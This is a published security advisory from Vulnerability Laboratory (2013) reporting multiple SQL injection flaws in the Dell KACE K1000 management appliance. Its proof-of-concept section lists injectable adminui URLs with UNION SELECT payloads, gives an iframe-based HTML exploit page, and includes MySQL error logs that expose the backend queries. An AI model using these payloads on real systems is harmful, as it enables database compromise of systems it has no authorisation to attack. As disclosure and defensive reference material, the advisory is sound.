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Dell Kace 1000 SMA 5.4.742 - SQL Injection Vulnerabilities



Title:
======
Dell Kace 1000 SMA 5.4.742 - SQL Injection Vulnerabilities


Date:
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2013-07-22


References:
===========
http://www.vulnerability-lab.com/get_content.php?id=832


VL-ID:
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832


Common Vulnerability Scoring System:
====================================
7.5


Introduction:
=============
Dell KACE is to provide an appliance-based approach to systems management, to 
create time for systems administration professionals, 
while saving money for their companies. Dell KACE Systems Management Appliances 
are available as both physical and virtual appliances. 

The KACE Management Appliance delivers a fully integrated systems management 
solution, unlike traditional software approaches that 
can require complex and time-consuming deployment and maintenance. KACE 
accomplishes this via an extremely flexible, intelligent 
appliance-based architecture that typically deploys in days and is self 
maintaining. The KACE Management Appliance also provides 
direct access to time-saving ITNinja systems management community information 
using AppDeploy Live, the leading destination for end 
point administrators. The result: Comprehensive systems management that is 
easy-to-use and that can be more economical than software 
only alternatives. Read more in the white paper KACE K1000 Management Appliance 
Architecture: Harnessing the Power of an 
Appliance-based Architecture. The KACE Management Appliance is designed for 
enterprises and business units with up to 20,000 nodes. 

(Copy of the Vendor Homepage:  
http://www.kace.com/products/systems-management-appliance )


Abstract:
=========
The Vulnerability Laboratory Research Team discovered a SQL Injection web 
vulnerabilities in Dell Kace K1000, Systems Management Appliance.


Report-Timeline:
================
2013-01-24:     Researcher Notification & Coordination (Ibrahim Mosaad El-Sayed)
2013-02-06:     Vendor Notification (Dell Security Team)
2013-02-08:     Vendor Response/Feedback  (Dell Security Team)
2013-**-**:     Vendor Fix/Patch (Dell Security Team)
2013-07-22:     Public Disclosure (Vulnerability Laboratory)


Status:
========
Published


Affected Products:
==================
DELL
Product: Kace K1000 SMA 5.4.70402


Exploitation-Technique:
=======================
Remote


Severity:
=========
Critical


Details:
========
Multiple SQL Injection vulnerabilities are detected in the Dell Kace K1000, 
Systems Management Appliance Application.
A SQL Injection vulnerability allows an attacker (remote) to execute/inject SQL 
commands in the affected application dbms. 

The sql injection vulnerabilities are located in the history_log.php, 
service.php, software.php, settings_network_scan.php, 
asset.php, asset_type.php, metering.php and mi.php files. All files are located 
in the adminui. A remote attacker is able 
to inject own sql commands when processing to request the vulnerable TYPE_ID 
and ID parameters.

Exploitation of the sql injection vulnerabilities requires no or a low 
privilege application user account and no user interaction. 
Successful exploitation of the vulnerability results in database management 
system & application compromise via remote sql injection attack. 


Vulnerable Module(s):
                                        [+] adminui

Vulnerable File(s):
                                        [+] history_log.php
                                        [+] service.php
                                        [+] software.php
                                        [+] settings_network_scan.php
                                        [+] asset.php
                                        [+] asset_type.php
                                        [+] metering.php
                                        [+] mi.php
                                        [+] replshare.php
                                        [+] kbot.php

Vulnerable Parameter(s):
                                        [+] TYPE_ID
                                        [+] ID


Proof of Concept:
=================
The SQL injection vulnerabilities can be exploited by remote attackers without 
privileged application user account and without required user interaction. 
For demonstration or reproduce ...

1.1
PoC:
https://pub37.137.0.0.1:8080/adminui/history_log.php?HISTORY_TYPE=ASSET&TYPE_NAME=Computer&TYPE_ID=7+union+Select+1,2,3,4,5,6,version%28%29,8,9,10,11,12--%20-

1.2
PoC:
https://pub37.137.0.0.1:8080/adminui/service.php?ID=-1211+union+select+1,2,3,4,5,version(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--%20-

1.3
 https://pub37.137.0.0.1:8080/adminui/software.php?ID=1291+[SQL-INJECTION!]--

Exploit:

<html>
<head><body><title>Dell Kace 1000 SMA v5.4.70402 - SQL Injection Exploit</title>
<iframe 
src=https://pub37.137.0.0.1:8080/adminui/history_log.php?HISTORY_TYPE=ASSET&TYPE_NAME=Computer&TYPE_ID=7+union+Select+1,2,3,4,5,
6,version%28%29,8,9,10,11,12--%20- width="600" height"600"><br><iframe 
src=https://pub37.137.0.0.1:8080/adminui/service.php?ID=-1211+
union+select+1,2,3,4,5,version(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--%20-
 width="600" height"600"><br><iframe src=
https://pub37.137.0.0.1:8080/adminui/software.php?ID=1291+[SQL-INJECTION!]-- 
width="600" height"600"><br>
</body></head>
</html>

 --- SQL Exception Error Log --- 
Error message: PHP Error: Uncaught ADODB_Exception in 
/kbox/kboxwww/adminui/software.php on line 95: 
mysql error: [1064: You have an error in your SQL syntax; check the manual that 
corresponds to your MySQL server 
version for the right syntax to use near ''1291''' at line 1] in 
EXECUTE("select OS_ID from SOFTWARE_OS_JT where SOFTWARE_ID = '1291''")
 
1.4
PoC: 
https://pub37.137.0.0.1:8080/adminui/settings_network_scan.php?ID=2+[SQL-INJECTION!]--%20-

--- SQL Exception Error Log --- 
Error message: PHP Error: Uncaught ADODB_Exception in 
/kbox/kboxwww/adminui/settings_network_scan.php on line 54: 
 mysql error: [1064: You have an error in your SQL syntax; check the manual 
that corresponds to your MySQL server version for the 
right syntax to use near ''' at line 1] 
 in EXECUTE("select * from SCAN_SETTINGS where ID = 2'")
 
1.5
PoC: 
https://pub37.137.0.0.1:8080/adminui/asset.php?ID=2+[SQL-INJECTION!]--%20-
 
--- SQL Exception Error Log --- 
Error message: PHP Error: Uncaught ADODB_Exception in 
/kbox/kboxwww/include/Asset.class.php on line 61: mysql error: 
[1064: You have an error in your SQL syntax; check the manual that corresponds 
to your MySQL server version for the 
right syntax to use near ''' at line 3] 
in EXECUTE("select *, DATE_FORMAT(CREATED,'%b %d %Y %I:%i:%s %p') as CREATED,
DATE_FORMAT(MODIFIED,'%b %d %Y %I:%i:%s %p') as MODIFIED
from ASSET where ID = 2'")

1.6
PoC:
https://pub37.137.0.0.1:8080/adminui/asset_type.php?ID=5+[SQL-INJECTION!]--%20-

--- SQL Exception Error Log --- 
Error message: PHP Error: Uncaught ADODB_Exception in 
/kbox/kboxwww/include/AssetType.class.php on line 62: mysql error: 
[1064: You have an error in your SQL syntax; check the manual that corresponds 
to your MySQL server version for the 
right syntax to use near ''5''' at line 1] 
in EXECUTE("select * from ASSET_TYPE where ID = '5''")

1.7
PoC: 
https://pub37.137.0.0.1:8080/adminui/metering.php?ID=11+[SQL-INJECTION!]--%20-&MONTHS=1

--- SQL Exception Error Log --- 
Error message: PHP Error: Uncaught ADODB_Exception in 
/kbox/kboxwww/adminui/metering.php on line 65: mysql error: 
[1064: You have an error in your SQL syntax; check the manual that corresponds 
to your MySQL server version for the 
right syntax to use near ''' at line 2] 
in EXECUTE("select LABEL_ID from FS_LABEL_JT
where FS_ID =11'") 

1.8
PoC: 
https://pub37.137.0.0.1:8080/adminui/mi.php?ID=5

--- SQL Exception Error Log --- 
Error message: PHP Error: Uncaught ADODB_Exception in 
/kbox/kboxwww/adminui/mi.php on line 350: mysql error: 
[1064: You have an error in your SQL syntax; check the manual that corresponds 
to your MySQL server version for the 
right syntax to use near 'hidden')))' at line 4] 
in EXECUTE("select ID,NAME from MACHINE
WHERE ID in ( Select MACHINE_ID from MACHINE_LABEL_JT
where LABEL_ID in ( Select LABEL_ID from MI_LABEL_JT
where MI_ID = '5'' and LABEL_ID in
(select ID from LABEL where TYPE='hidden')))")

1.9
PoC: 
https://pub37.137.0.0.1:8080/adminui/replshare.php?ID=1+[SQL-INJECTION!]--%20-

--- SQL Exception Error Log --- 
Error message: PHP Error: Uncaught ADODB_Exception in 
/kbox/include/ReplShare.class.php on line 20: mysql error: 
[1064: You have an error in your SQL syntax; check the manual that corresponds 
to your MySQL server version for the 
right syntax to use near ''' at line 2] 
in EXECUTE("select * from REPLICATION_SHARE where ID=1'")

1.10
PoC: 
https://pub37.137.0.0.1:8080/adminui/kbot.php?ID=20+[SQL-INJECTION!]--%20-

--- SQL Exception Error Log --- 
Error message: PHP Error: Uncaught ADODB_Exception in 
/kbox/kboxwww/include/KBot.class.php on line 183: mysql error: 
[1064: You have an error in your SQL syntax; check the manual that corresponds 
to your MySQL server version for the 
right syntax to use near ''20''' at line 15] 
in EXECUTE("select k.*, DATE_FORMAT(k.CREATED,'%b %d %Y %I:%i:%s %p'), 
DATE_FORMAT(k.MODIFIED,'%b %d %Y %I:%i:%s %p'),
unix_timestamp(k.MODIFIED) as MODIFIED_TMSTAMP,
unix_timestamp(k.CREATED) as CREATED_TMSTAMP,
f.ID as FORM_ID, f.FORM_URL, f.FORM_NAME,
s.SCRIPT_TEXT, s.FILE_NAME, s.CHECKSUM, s.TIMEOUT,
s.REMOVE_FILES, s.UPLOAD_FILE, s.UPLOAD_FILE_PATH, s.UPLOAD_FILE_NAME,
k.RUN_AS_USR, k.RUN_AS_PASS_ENC,
k.ALERT_ENABLED, k.ALERT_DIALOG_OPTIONS,
k.ALERT_DIALOG_TIMEOUT, k.ALERT_DIALOG_TIMEOUT_ACTION, k.ALERT_SNOOZE_DURATION, 
k.ALERT_MESSAGE
from KBOT k
left join KBOT_FORM f
on k.ID = f.KBOT_ID
left join KBOT_SHELL_SCRIPT s
on k.ID = s.KBOT_ID
where k.ID = '20''")


Risk:
=====
The security risk of the remote sql injection web vulnerabilities are estimated 
as critical.


Credits:
========
Vulnerability Laboratory [Research Team] - Ibrahim El-Sayed (the_storm) 
ibrahim@xxxxxxxxxxxxxxxxx]


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